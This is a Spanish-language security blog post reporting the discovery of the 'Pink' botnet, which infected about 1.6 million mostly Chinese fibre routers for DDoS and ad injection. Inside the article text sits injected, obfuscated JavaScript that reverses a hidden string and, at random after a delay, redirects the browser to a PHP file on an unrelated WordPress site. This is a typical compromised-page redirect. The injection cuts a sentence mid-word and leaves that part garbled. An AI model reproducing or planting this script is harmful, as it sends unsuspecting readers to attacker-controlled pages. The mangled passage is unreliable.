Descubren “Pink”, una de las botnets más grandes del mundo
Investigadores del grupo Netlab de Qihoo 360 han descubierto lo que dicen que es la “mayor red de bots” bautizada como Pink, en los últimos seis años con más de 1,6 millones de dispositivos infectados, la gran mayoría alojados en China
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tow6T6bHQRp1iIt-l7MM2L-DX5rrszJrcZnX3M8y” alt=”Decubierta botnet Pink” /></p>
<p>El grupo de Netlab le ha pues<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
Esta botnet está preparada para hacer ataques de denegación de servicios distribuidos (DDos) e insertar anuncios en sitios web HTTP visitados por usuarios desprevenidos. La infección va dirigida principalmente a router de fibra basados en MIPS, además, los controladores de Pink basan su operación en una combinación de servicios de terceros como Github, P2P y servidores centrales comando y control (C2) para controlar las comunicaciones. Los atacantes tienen tantos recursos que cada vez que un proveedor de servicios trataba de abordar el problema, un botmaster enviaba actualizaciones de firmware para interrumpir estas actividades.
https://lh3.googleusercontent.com/VT-Gm4L7o7SSMpvOvEJ-X46OtmnbDN24dxFKTRkaRwtGAcAaTCh9T02SoCOCr5At3K3rResJ-AN5_8SHdsyVw2fCM8vBMJ5xbfc5uif0DHpwytI52P4Y5wcRjXnb8fho9X09OpoM
Pink también hace uso del protocolo DNS-Over-HTTPS (DoH), el cual, se utiliza para la resolución remota del sistema de nombres de dominio (DNS) a través del protocolo HTTPS, para la conexión a un controlador específico.
La empresa de ciberseguridad NSFOCUS, señaló en un informe independiente que más del 96% de los nodos zombis que formaban parte de la botnet se encontraban en China, aprovechándose de vulnerabilidades Zero-Day en los dispositivos. Aunque una parte importante de los dispositivos infectados ha sido reparada y restaurada a su estado anterior a partir de julio de 2020, se dice que la botnet sigue activa, con unos 100.000 nodos.
Se han realizado casi 100 ataques DDos con Pink, este descubrimiento es un indicio más de cómo las botnets son una poderosa herramienta para que los delincuentes realicen una gran variedad de intrusiones.
Ver información original al respecto en Fuente>
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.